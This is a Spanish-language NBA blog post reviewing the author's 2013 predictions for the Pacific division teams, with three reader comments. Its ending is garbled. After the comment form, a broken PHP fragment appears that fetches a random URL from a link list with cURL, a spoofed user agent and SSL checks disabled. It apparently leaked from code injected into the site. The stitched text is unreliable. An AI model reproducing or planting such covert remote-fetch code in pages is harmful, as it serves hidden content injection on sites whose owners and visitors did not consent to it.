Revisando los pronósticos 2013: Pacific

02 de April de 2013 por TheDeerHunter

LOS ANGELES CLIPPERS

Análisis
Pronóstico:
45-50 victorias. 2ª Ronda.
Probabilidad de acierto: Media baja
Calificación pronóstico: D+

Protagonizábamos un intenso debate en octubre sobre la excelencia de la remodelada segunda unidad de los Clippers comparándola con la que habían integrado Mo Will, Nick Young, Foye, Martin y Reggie Evans más el propio Bledsoe, en el decisivo desempeño de aquella durante la postemporada del final de curso pasado. La cuestión aún no ha quedado resuelta. Exceptuando a Bledsoe, común en ambas, podemos destacar la sobresaliente labor de Crawford, candidato a mejor 6º hombre, como también la de Barnes. Mucho más por debajo queda el rendimiento de Odom, como también el de gente como Hill, Turiaf o Hollins. Willie Green ha sido relegado también al banco tras el regreso de Billups. Habrá que esperar a los cruces para terminar de aclarar el entuerto, así como de terminar de hacer malo el análisis rompiendo ese hipotético techo en semifinales de conferencia que les fijábamos.

Fuimos críticos, en efecto, con la política de fichajes. Mantengo que no creo que fuera este aspecto lo que ha convertido a Clippers en posibles candidatos al trono del Oeste. Llama la atención el mal cartel que tiene entre mucha gente Vinny Del Negro. Su equipo se ha convertido en uno de los más duros defendiendo de toda la liga y buena parte del mérito es suyo.

Otro factor ha sido la mejora de Griffin, tras un gris curso pasado en términos de desarrollo. También se entiende mejor con Paul, convirtiéndose juntos en una de las parejas de la liga. El triángulo formado junto a Crawford ha sido el pilar que sostiene todo. Con Billups podría formarse un cuarteto mágico y habrá que observar el valor añadido que supone la experiencia en playoffs de Odom, Hill, Barnes y el resto. Para eso se les fichó este verano. 

GOLDEN STATE WARRIORS

Análisis
Pronóstico:
43-39 (8º en temporada regular). Primera ronda de playoffs.
Probabilidad de acierto: Media
Calificación pronóstico: B

Apuesta de precisión en la que nos quedamos algo cortos. Muchos no terminábamos de creernos el prometido potencial que se vislumbraba, consecuencia de la larga temporada de desilusión en la bahía y la dureza de la conferencia, pero nos pusimos el mundo por montera firmándoles plaza de playoffs, objetivo último del equipo este año. Y eso que durante buena parte de la campaña se han movido por la parte alta del cuadro, siendo una de las sensaciones de la primera mitad del curso. El 2013 no ha sido tan generoso con ellos y se han acercado más a lo que prudencialmente pensábamos antes del inicio de la regular.

Excelente noticia para el baloncesto la recuperación de Stephen Curry tras su preocupante viacrucis de lesiones. Fabuloso el tándem formado con David Lee, otra de las parejas que serán recordadas en los anales de este curso. Uno ha desplegado el arte y el otro la dureza. Lee, entre otras cosas, ha sido el máximo responsable que los Warriors se hayan convertido en una de las potencias reboteadoras de la liga. Quién lo hubiera dicho.

Del resto, a destacar la labor secundaria de los siempre cumplidores Landry y Jack más la buena pinta de “animalico” de Harrison Barnes. En el plano negativo Bogut no termina de deshacerse de sus problemas físicos y Klay Thompson no ha despegado todo lo que algunos esperábamos. En cualquier caso se demuestra que hay material para ser optimistas. Definitivamente ha amanecido en la bahía.

LOS ANGELES LAKERS

Análisis
Pronóstico: a
lrededor de 65 victorias en regular season y campeones de la NBA 2013.
Probabilidad de acierto: Entre remota e imposible.
Calificación pronóstico: F

“Así, con un poker de ases, con la mejor mano de cuantos jugadores hay en la mesa, los Lakers hacen una apuesta definitivamente ganadora. All in.”

¿Dónde está nuestro póker de ases con el que nos íbamos a jugar hasta la casa? ¿Será que el whisky on the rocks se nos había subido a la cabeza y vimos un póker donde sólo había una pareja? ¿O quizá en medio de nuestra caraja habíamos mirado las cartas del vecino en lugar de las nuestras? Estamos ante lo que puede ser uno de los mayores batacazos de la historia de la liga… y nos quejábamos del año de Payton y Malone.

En estos momentos, la posibilidad de que los Lakers no entren en la lucha por el título no sólo es perfectamente posible, sino que también sería justo. En el caso de que lo logren, todo puede pasar, porque sobre el papel son muy buenos y en este deporte siempre ha habido sorpresas, pero se nos antoja ciencia ficción pura que puedan eliminar a ninguno de los cocos de la conferencia, en especial a los Thunder.

¿Qué ha fallado? Un poco de todo. Problemas graves en el apartado físico. Falta de química. Lagunas mentales. Falta de ambición y de compromiso. Errores en la dirección… en realidad sería más corto mencionar qué es lo que no ha fallado. Muchos lo discutirán, pero a mí sólo se me ocurre a Kobe.

En definitiva. “¿Ser campeones o no ser?”… pues lo segundo.

SACRAMENTO KINGS

Análisis
Pronóstico:
35-47 (fuera de Playoffs)
Probabilidad de acierto: Media-baja
Calificación pronóstico: C

En el bonito epitafio que publicábamos en octubre fuimos moderadamente optimistas en el plano deportivo, teniendo en cuenta que no se ha superado el 30% de victorias en el total de partidos disputados en los últimos 5 años. Finalmente los Kings se quedarán algo por debajo de nuestras premisas, no mucho pero insuficiente para dejar un buen sabor de boca antes de la teórica despedida.

El futuro es muy incierto en la capital de California. Parece que esa incertidumbre que plasmó de forma maravillosa el equipo “yé-yé”, de “tortilla de patatas” que decía Andrés, de la época de los Webber, Bibby, Divac, Stojakovic y Christie, la ha heredado la franquicia a todos los niveles, pero en sentido negativo.

La incertidumbre, en lugar del dinámico juego de pase que tenían los chicos de Adelman, se traduce en la personalidad incendiaria de su máxima estrella, en el físico de Tyreke, en la manera de desaprovechar recursos y de despreciar valiosas elecciones de draft, en cuántos puntos encajarán cada velada y, cómo no, en adivinar dónde acabarán jugando el año que viene. Hace falta moral para mantenerse fiel a estos colores.

Con todo, es la mejor (o menos mala) campaña de los últimos tiempos. Se les ha visto cosas y han podido disfrutar de alguna satisfacción puntual como las victorias ante Celtics, Lakers y Chicago, entre otros.

PHOENIX SUNS

Análisis
Pronóstico:
Entre 30 y 33 victorias.
Probabilidad de acierto: Imposible.
Calificación pronóstico: D

Nos decía un visitante hace tiempo que si sumáramos el total de victorias recogidas en nuestros pronósticos superaría ampliamente la cifra de 1.230 partidos, que son todos los jugados en la regular. Desconozco si es cierto pero no me extrañaría porque no los consensuamos para nada y se palpa un cierto tono optimista en todos ellos. Éste es un buen ejemplo.

El año 1 después de Nash ha sido malo, como no podía ser de otra manera. De no mediar un milagro los Suns van a ser el peor equipo del oeste. La plantilla está configurada con una mezcla de correctos jugadores de rol, algunos veteranos y tipos de los que aún se cree que cuentan con potencial de estrella. Para colmo tampoco han tenido suerte en sus últimas elecciones de jugadores jóvenes. Son de lo peorcito en ataque y en defensa. No debe de extrañar su balance.

En la parte positiva podemos rescatar a Dragic en un año más que digno, disfrutando de un protagonismo que hasta ahora no había encontrado en esta liga. La mejor temporada de su carrera. También destacaría a Jermaine O’neal, los minutos que le aguantan sus piernas.

A partir de ahí, flojo año de la columna vertebral del equipo (Scola, Gortat, Dudley y Shannon Brown) así como de los “estrellados” Beasley y Wesley Johnson. Tampoco de los hermanos Morris, ni de lógicamente Kendall Marshall, que apenas ha contado. En esta tesitura, esa travesía por el desierto que señalábamos va a durar una buena temporada.

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Voy a ver si encuentro un agujero lo suficientemente profundo como para esconderme xD

      Citar

  2. rumbero dice:
    #2

    Una F de “fail”. Muy apropiado 😀
    En tu defensa hay que decir los comentarios menos optimistas del análisis los daban como favoritos por detrás de Thunder y Heat. Vaya, que si hay algun analista que dijera a principios de temporada que pelearian por PO es un jodido visionario o un aficionado resentido de los Celtics.

      Citar

  3. R1Molano dice:
    #3

    MI clavada de análisis de los Warriors es acojonante (ver el post del análisis) jaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>